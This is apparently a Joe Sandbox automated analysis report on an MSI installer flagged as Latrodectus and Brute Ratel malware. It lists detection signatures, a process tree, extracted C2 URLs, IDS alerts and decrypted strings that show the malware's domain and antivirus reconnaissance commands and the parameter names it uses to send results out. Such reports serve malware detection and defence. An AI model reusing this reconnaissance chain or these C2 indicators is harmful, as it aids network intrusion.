Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fes.msi

Overview

General Information

Sample name:fes.msi
Analysis ID:1567646
MD5:371fe9184f46204250bcb30fe62f3a08
SHA1:490453e5eeaaf89071a29c68548314d1e9b21592
SHA256:658b8c47d7193c7c31a2540b2f54fcdfb9298d8346a4ad3be7e684ef946f57a5
Tags:BruteRatelBruteRatelC4Latrodectusmsiuser-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Uses whoami command line tool to query computer and username
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 6092 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 2492 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5824 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI17D3.tmp (PID: 6344 cmdline: "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 7176 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 8120 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 8172 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • cmd.exe (PID: 5780 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 5824 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
            • WmiPrvSE.exe (PID: 5932 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 3688 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 3052 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 7320 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 1892 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 5924 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 7416 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 7508 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 7480 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 4996 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5436 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 2596 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 2848 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2024 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5836 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 1404 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 2144 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 4556 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • findstr.exe (PID: 5324 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7672 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • whoami.exe (PID: 5632 cmdline: whoami /groups MD5: A4A6924F3EAF97981323703D38FD99C4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
SourceRuleDescriptionAuthorStrings
00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
            Click to see the 3 entries

            System Summary

            barindex
            Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7192, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4996, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5436, ProcessName: net.exe
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: /c whoami /groups, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7672, ParentProcessName: cmd.exe, ProcessCommandLine: whoami /groups, ProcessId: 5632, ProcessName: whoami.exe
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5924, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 7416, ProcessName: net.exe
            Source: Process startedAuthor: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5924, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 7416, ProcessName: net.exe
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 8120, ProcessName: cmd.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T17:44:54.379891+010020283713Unknown Traffic192.168.2.449851104.21.68.89443TCP
            2024-12-03T17:44:58.055216+010020283713Unknown Traffic192.168.2.449861104.21.68.89443TCP
            2024-12-03T17:45:01.629389+010020283713Unknown Traffic192.168.2.449869104.21.68.89443TCP
            2024-12-03T17:45:05.379758+010020283713Unknown Traffic192.168.2.449878104.21.68.89443TCP
            2024-12-03T17:45:08.346102+010020283713Unknown Traffic192.168.2.449886104.21.68.89443TCP
            2024-12-03T17:45:11.770296+010020283713Unknown Traffic192.168.2.449894104.21.68.89443TCP
            2024-12-03T17:45:14.774392+010020283713Unknown Traffic192.168.2.449904104.21.68.89443TCP
            2024-12-03T17:45:20.564003+010020283713Unknown Traffic192.168.2.449918104.21.68.89443TCP
            2024-12-03T17:45:23.534992+010020283713Unknown Traffic192.168.2.449926104.21.68.89443TCP
            2024-12-03T17:45:26.493487+010020283713Unknown Traffic192.168.2.449933104.21.68.89443TCP
            2024-12-03T17:45:29.462059+010020283713Unknown Traffic192.168.2.449940104.21.68.89443TCP
            2024-12-03T17:45:32.419083+010020283713Unknown Traffic192.168.2.449948104.21.68.89443TCP
            2024-12-03T17:45:35.304375+010020283713Unknown Traffic192.168.2.449956104.21.68.89443TCP
            2024-12-03T17:45:38.218907+010020283713Unknown Traffic192.168.2.449962104.21.68.89443TCP
            2024-12-03T17:45:41.613892+010020283713Unknown Traffic192.168.2.449972104.21.68.89443TCP
            2024-12-03T17:45:44.594985+010020283713Unknown Traffic192.168.2.449979104.21.68.89443TCP
            2024-12-03T17:45:47.402474+010020283713Unknown Traffic192.168.2.449986104.21.68.89443TCP
            2024-12-03T17:45:50.363398+010020283713Unknown Traffic192.168.2.449994104.21.68.89443TCP
            2024-12-03T17:45:53.382246+010020283713Unknown Traffic192.168.2.450002104.21.68.89443TCP
            2024-12-03T17:45:56.463152+010020283713Unknown Traffic192.168.2.450008104.21.68.89443TCP
            2024-12-03T17:45:59.272932+010020283713Unknown Traffic192.168.2.450016104.21.68.89443TCP
            2024-12-03T17:46:02.293633+010020283713Unknown Traffic192.168.2.450025104.21.68.89443TCP
            2024-12-03T17:46:05.673225+010020283713Unknown Traffic192.168.2.450029104.21.68.89443TCP
            2024-12-03T17:46:08.704029+010020283713Unknown Traffic192.168.2.450030104.21.68.89443TCP
            2024-12-03T17:46:11.743479+010020283713Unknown Traffic192.168.2.450031104.21.68.89443TCP
            2024-12-03T17:46:14.546290+010020283713Unknown Traffic192.168.2.450032104.21.68.89443TCP
            2024-12-03T17:46:17.305730+010020283713Unknown Traffic192.168.2.450033104.21.68.89443TCP
            2024-12-03T17:46:20.824721+010020283713Unknown Traffic192.168.2.450034104.21.68.89443TCP
            2024-12-03T17:46:23.775020+010020283713Unknown Traffic192.168.2.450035104.21.68.89443TCP
            2024-12-03T17:46:26.531713+010020283713Unknown Traffic192.168.2.450036104.21.68.89443TCP
            2024-12-03T17:46:29.573064+010020283713Unknown Traffic192.168.2.450037104.21.68.89443TCP
            2024-12-03T17:46:32.535273+010020283713Unknown Traffic192.168.2.450038104.21.68.89443TCP
            2024-12-03T17:46:35.482631+010020283713Unknown Traffic192.168.2.450039104.21.68.89443TCP
            2024-12-03T17:46:38.669901+010020283713Unknown Traffic192.168.2.450040104.21.68.89443TCP
            2024-12-03T17:46:41.921134+010020283713Unknown Traffic192.168.2.450041104.21.68.89443TCP
            2024-12-03T17:46:44.882994+010020283713Unknown Traffic192.168.2.450042104.21.68.89443TCP
            2024-12-03T17:46:47.937903+010020283713Unknown Traffic192.168.2.450043104.21.68.89443TCP
            2024-12-03T17:46:50.975118+010020283713Unknown Traffic192.168.2.450044104.21.68.89443TCP
            2024-12-03T17:46:54.009056+010020283713Unknown Traffic192.168.2.450045104.21.68.89443TCP
            2024-12-03T17:46:56.971792+010020283713Unknown Traffic192.168.2.450046104.21.68.89443TCP
            2024-12-03T17:47:00.013389+010020283713Unknown Traffic192.168.2.450047104.21.68.89443TCP
            2024-12-03T17:47:03.056418+010020283713Unknown Traffic192.168.2.450048104.21.68.89443TCP
            2024-12-03T17:47:05.980918+010020283713Unknown Traffic192.168.2.450049104.21.68.89443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T17:44:54.415374+010020487351A Network Trojan was detected192.168.2.449851104.21.68.89443TCP
            2024-12-03T17:44:59.611086+010020487351A Network Trojan was detected192.168.2.449861104.21.68.89443TCP
            2024-12-03T17:45:03.275392+010020487351A Network Trojan was detected192.168.2.449869104.21.68.89443TCP
            2024-12-03T17:45:07.016597+010020487351A Network Trojan was detected192.168.2.449878104.21.68.89443TCP
            2024-12-03T17:45:22.185697+010020487351A Network Trojan was detected192.168.2.449918104.21.68.89443TCP
            2024-12-03T17:45:23.620132+010020487351A Network Trojan was detected192.168.2.449926104.21.68.89443TCP
            2024-12-03T17:45:28.142357+010020487351A Network Trojan was detected192.168.2.449933104.21.68.89443TCP
            2024-12-03T17:45:31.050996+010020487351A Network Trojan was detected192.168.2.449940104.21.68.89443TCP
            2024-12-03T17:45:34.078027+010020487351A Network Trojan was detected192.168.2.449948104.21.68.89443TCP
            2024-12-03T17:45:35.305293+010020487351A Network Trojan was detected192.168.2.449956104.21.68.89443TCP
            2024-12-03T17:45:39.863630+010020487351A Network Trojan was detected192.168.2.449962104.21.68.89443TCP
            2024-12-03T17:45:43.254844+010020487351A Network Trojan was detected192.168.2.449972104.21.68.89443TCP
            2024-12-03T17:45:45.985478+010020487351A Network Trojan was detected192.168.2.449979104.21.68.89443TCP
            2024-12-03T17:45:48.998507+010020487351A Network Trojan was detected192.168.2.449986104.21.68.89443TCP
            2024-12-03T17:45:51.982734+010020487351A Network Trojan was detected192.168.2.449994104.21.68.89443TCP
            2024-12-03T17:45:55.005110+010020487351A Network Trojan was detected192.168.2.450002104.21.68.89443TCP
            2024-12-03T17:45:57.857798+010020487351A Network Trojan was detected192.168.2.450008104.21.68.89443TCP
            2024-12-03T17:46:00.923656+010020487351A Network Trojan was detected192.168.2.450016104.21.68.89443TCP
            2024-12-03T17:46:03.910895+010020487351A Network Trojan was detected192.168.2.450025104.21.68.89443TCP
            2024-12-03T17:46:07.271717+010020487351A Network Trojan was detected192.168.2.450029104.21.68.89443TCP
            2024-12-03T17:46:10.384291+010020487351A Network Trojan was detected192.168.2.450030104.21.68.89443TCP
            2024-12-03T17:46:13.177160+010020487351A Network Trojan was detected192.168.2.450031104.21.68.89443TCP
            2024-12-03T17:46:15.951144+010020487351A Network Trojan was detected192.168.2.450032104.21.68.89443TCP
            2024-12-03T17:46:18.925226+010020487351A Network Trojan was detected192.168.2.450033104.21.68.89443TCP
            2024-12-03T17:46:22.430239+010020487351A Network Trojan was detected192.168.2.450034104.21.68.89443TCP
            2024-12-03T17:46:25.189996+010020487351A Network Trojan was detected192.168.2.450035104.21.68.89443TCP
            2024-12-03T17:46:28.179025+010020487351A Network Trojan was detected192.168.2.450036104.21.68.89443TCP
            2024-12-03T17:46:31.178283+010020487351A Network Trojan was detected192.168.2.450037104.21.68.89443TCP
            2024-12-03T17:46:34.164009+010020487351A Network Trojan was detected192.168.2.450038104.21.68.89443TCP
            2024-12-03T17:46:37.154947+010020487351A Network Trojan was detected192.168.2.450039104.21.68.89443TCP
            2024-12-03T17:46:40.295686+010020487351A Network Trojan was detected192.168.2.450040104.21.68.89443TCP
            2024-12-03T17:46:43.513199+010020487351A Network Trojan was detected192.168.2.450041104.21.68.89443TCP
            2024-12-03T17:46:46.549587+010020487351A Network Trojan was detected192.168.2.450042104.21.68.89443TCP
            2024-12-03T17:46:49.573431+010020487351A Network Trojan was detected192.168.2.450043104.21.68.89443TCP
            2024-12-03T17:46:52.624897+010020487351A Network Trojan was detected192.168.2.450044104.21.68.89443TCP
            2024-12-03T17:46:55.621124+010020487351A Network Trojan was detected192.168.2.450045104.21.68.89443TCP
            2024-12-03T17:46:58.640678+010020487351A Network Trojan was detected192.168.2.450046104.21.68.89443TCP
            2024-12-03T17:47:01.667227+010020487351A Network Trojan was detected192.168.2.450047104.21.68.89443TCP
            2024-12-03T17:47:04.446766+010020487351A Network Trojan was detected192.168.2.450048104.21.68.89443TCP
            2024-12-03T17:47:07.616711+010020487351A Network Trojan was detected192.168.2.450049104.21.68.89443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T17:45:10.537073+010020180521A Network Trojan was detected192.168.2.449886104.21.68.89443TCP
            2024-12-03T17:45:13.494370+010020180521A Network Trojan was detected192.168.2.449894104.21.68.89443TCP
            2024-12-03T17:45:16.562417+010020180521A Network Trojan was detected192.168.2.449904104.21.68.89443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T17:45:10.537073+010028032742Potentially Bad Traffic192.168.2.449886104.21.68.89443TCP
            2024-12-03T17:45:16.562417+010028032742Potentially Bad Traffic192.168.2.449904104.21.68.89443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/WAvira URL Cloud: Label: malware
            Source: https://reateberam.com/Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/GAvira URL Cloud: Label: malware
            Source: 9.2.explorer.exe.3110000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c ipconfig /all
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c systeminfo
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c nltest /domain_trusts
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c net view /all
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c net view /all /domain
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &ipconfig=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c net config workstation
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /c whoami /groups
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &systeminfo=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &domain_trusts=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &domain_trusts_all=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &net_view_all_domain=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &net_view_all=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &net_group=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &wmic=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &net_config_ws=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &net_wmic_av=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &whoami_group=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "pid":
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "%d",
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "proc":
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "%s",
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "subproc": [
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &proclist=[
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "pid":
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "%d",
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "proc":
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "%s",
